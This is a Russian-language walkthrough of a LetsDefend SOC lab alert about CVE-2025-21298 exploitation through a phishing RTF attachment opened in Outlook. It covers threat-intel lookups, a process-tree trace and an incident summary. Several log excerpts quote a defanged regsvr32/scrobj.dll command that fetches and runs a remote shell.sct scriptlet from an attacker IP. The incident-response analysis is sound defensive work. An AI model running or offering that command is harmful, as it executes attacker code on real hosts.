SOC336 - Обнаружена эксплуатация Windows OLE Zero-Click RCE (CVE-2025-21298) Прохождение
(Наверх)
Один из наших сотрудников, Остин, получил фишинговое письмо от подозрительного отправителя, и после того, как он открыл письмо в Outlook, 4 февраля 2025 года в 16:18, было сработано оповещение. Причина срабатывания: "Вредоносное вложение RTF с известным шаблоном эксплуатации CVE-2025-21298" .
(Наверх)

EventID : 314
Время события : 4 февраля 2025, 16:18 (думаю, это неверно)
Правило : SOC336 - Обнаружена эксплуатация Windows OLE Zero-Click RCE (CVE-2025-21298)
Уровень : Аналитик безопасности
SMTP-адрес : 84.38.130.118
Адрес источника : [email protected]
Адрес назначения : [email protected]
Тема письма : Важно: Требуются действия для предстоящего дедлайна проекта
Вложение : mail.rtf
Хэш вложения : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
Действие устройства : Разрешено
Причина срабатывания : Обнаружено вредоносное вложение RTF с известным шаблоном эксплуатации CVE-2025-21298.
(Наверх)
Погрузимся в журналы безопасности электронной почты, управления журналами и безопасности конечных точек для триажа оповещения.

Я выполнил поиск адреса отправителя projectmanagement@pm[.]me и открыл письмо с темой "Важно: Требуются действия для предстоящего дедлайна проекта", отправленное в 05:12 того же дня, что показалось мне странным, поскольку срочный тон и формулировки, такие как "Важно" и "Требуются действия", дали мне понять, что это фишинговое письмо.

Я выполнил поиск домена pm[.]me в VirusTotal, и только один вендор посчитал его подозрительным.

Однако, когда я выполнил поиск SMTP-адреса 84[.]38[.]130[.]118, 7 вендоров пометили его как вредоносный и содержащий вредоносное ПО, и он был связан с C2-сервером SILVER.


84[.]38[.]130[.]118 также был найден в базе данных AbuseIPDB. Он находится в Риге, Латвия, принадлежит домену rixhost.lv и классифицируется как DDoS-атака, взлом и эксплуатируемый хост.

Наконец, я выполнил поиск хэша df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 вложения mail.rtf в VirusTotal, и 29 из 61 вендоров пометили вложение как вредоносное. Оно принадлежит семейству вредоносных программ rtfmalformb и связано с уязвимостью CVE-2025-21298.
Было подтверждено, что Остину было отправлено фишинговое письмо с вредоносным вложением.
(Наверх)
Давайте проверим, были ли подозрительные действия после 05:12, когда Остин открыл фишинговое письмо.

Сначала я проверил прокси-журнал и выполнил поиск вредоносного IP-адреса отправителя 84[.]38[.]130[.]118, обнаружив, что в 08:06 был выполнен HTTP GET-запрос к вредоносному IP-адресу по URL hxxp://84[.]38[.]130[.]118/shell[.]sct, инициированный cmd.exe, загружающий файл скриптлета Windows. Код ответа был 200 OK, что указывает на то, что исходящий трафик был разрешен и не заблокирован брандмауэром. Было необычно получить файл скрипта, который возможно содержал скрипт обратной оболочки.
(Наверх)


Поскольку исходящий трафик на вредоносный IP-адрес был инициирован cmd.exe, я сначала проверил историю терминала и обнаружил, что в 08:06:08 была выполнена команда "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" для запуска regsvr32.exe с целью получения файла скрипта с вредоносного IP-адреса с помощью scrobj.dll.
Использование встроенных утилит Windows для получения скрипта может оставить минимальные следы в системе, усложняя процесс обратной разработки и анализа вредоносного ПО!
(Наверх)

Было подтверждено, что в 08:06:42 было установлено соединение с вредоносным IP 84[.]38[.]130[.]118 после события выполнения команды.
(Наверх)
Итак, почему cmd.exe был выполнен простым кликом по письму? Несмотря на то, что не было найдено никаких доказательств загрузки вредоносного вложения mail.rtf Остином, я проверил журналы конечных точек и выполнил поиск любых событий около 08:06.

Идентификатор процесса: 7023
Время события: 4 фев 2025 08:06:25
Командная строка: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Родительский процесс: cmd.exe

Хорошо, тогда давайте посмотрим на родительский процесс cmd.exe.
Идентификатор процесса: 6784
Время события: 4 фев 2025 08:06:08
Командная строка: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Родительский процесс: outlook.exe

И, наконец, проверил родительский процесс outlook.exe.
Идентификатор процесса: 4820
Время события: 4 фев 2025 08:05:15
Командная строка: "C:\Windows\System32\cmd.exe"
Родительский процесс: explorer.exe
Итак, мы можем заключить, что вредоносные процессы в виде дерева:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Выполнение скрипта !
Однако меня по-прежнему мучил вопрос, как были инициированы вредоносные процессы без загрузки и открытия вредоносного вложения и как outlook.exe породил вредоносный процесс, пока я не нашел информацию о CVE-2025-21298.
(Наверх)

Согласно статье от Offsec, в январе 2025 года была обнаружена критическая уязвимость Windows OLE zero-click, позволяющая выполнить удаленный код (RCE) через электронную почту, с оценкой CVSS 9.8. Когда целевой получатель просто открывает или просматривает в Microsoft Outlook вредоносное письмо, содержащее вредоносный RTF-документ со встроенным скриптом , уязвимость срабатывает, позволяя злоумышленнику выполнить произвольный код в затронутой системе.
Я провел небольшое исследование Windows OLE и процессов перехвата RTF-документов в Google и Gemini, а также связал это с моими знаниями в области обратной разработки:
(Наверх)






Не помещен в карантин

Вредоносное

Доступ получен







(Наверх)
Классификация: Критическая
Тип: Вредоносное ПО
Время активности:
4 фев 2025, 05:12 (получено фишинговое письмо)
4 фев 2025, 08:05:15 - 4 фев 2025, 08:06:42 (фишинговое письмо открыто и выполнен вредоносный код)
Затронутые сущности:
Адрес источника: projectmanagement@pm[.]me
SMTP-адрес: 84[.]38[.]130[.]118
Адрес электронной почты получателя: Austin@letsdefend[.]io
IP-адрес получателя: 172[.]16[.]17[.]137
Имя хоста: Austin
Причины верного срабатывания:
4 февраля 2025 года в 05:12 с адреса [email protected] (IP-адрес: 84.38.130.118) на адрес [email protected] (IP-адрес: 172.16.17.137) было отправлено подозрительное письмо с темой "Важно: Требуются действия для предстоящего дедлайна проекта", содержащее вложение mail.rtf (SHA256-хэш: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). Срочный тон и формулировки, использованные в теме, дали понять, что это фишинговое письмо. Threat Intel (VirusTotal и AbuseIPDB) пометили IP-адрес отправителя, расположенный в Риге, Латвия, принадлежащий домену rixhost.lv, а также вложение как вредоносные.
Согласно прокси-журналам, в 08:06 был выполнен HTTP GET-запрос к вредоносному IP-адресу по URL hxxp://84[.]38[.]130[.]118/shell[.]sct, инициированный cmd.exe, загружающий файл скриптлета Windows. Код ответа был 200 OK, что указывает на то, что исходящий трафик к вредоносному IP-адресу был разрешен и не заблокирован брандмауэром.
Согласно журналам безопасности конечных точек, вредоносный код "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) был инициирован cmd.exe (PID: 6784), порожденным outlook.exe (PID: 4820).
Эксплуатация была вызвана критической уязвимостью Windows OLE zero-click (CVE-2025-21298), позволяющей выполнить удаленный код (RCE) через электронную почту, с оценкой CVSS 9.8 в январе 2025 года. Когда целевой получатель просто открывает или просматривает в Microsoft Outlook вредоносное письмо, содержащее вредоносный RTF-документ со встроенным скриптом, уязвимость срабатывает, позволяя злоумышленнику выполнить произвольный код в затронутой системе, потенциально устанавливая обратную оболочку на C2-сервер.
Причины для эскалации:
Хотя активный поствзломный C2-сетевой трафик еще не был окончательно обнаружен, журналы безопасности конечных точек подтвердили выполнение regsvr32.exe с использованием scrobj.dll для получения файла скриптлета shell.sct. Из-за оценки CVSS 9.8 уязвимости CVE-2025-21298 требуется дальнейшее расследование для проверки наличия подозрительной активности на хосте, такой как сохранение доступа или кража данных.
Меры по устранению:
Индикаторы компрометации:
(К началу)
(К началу)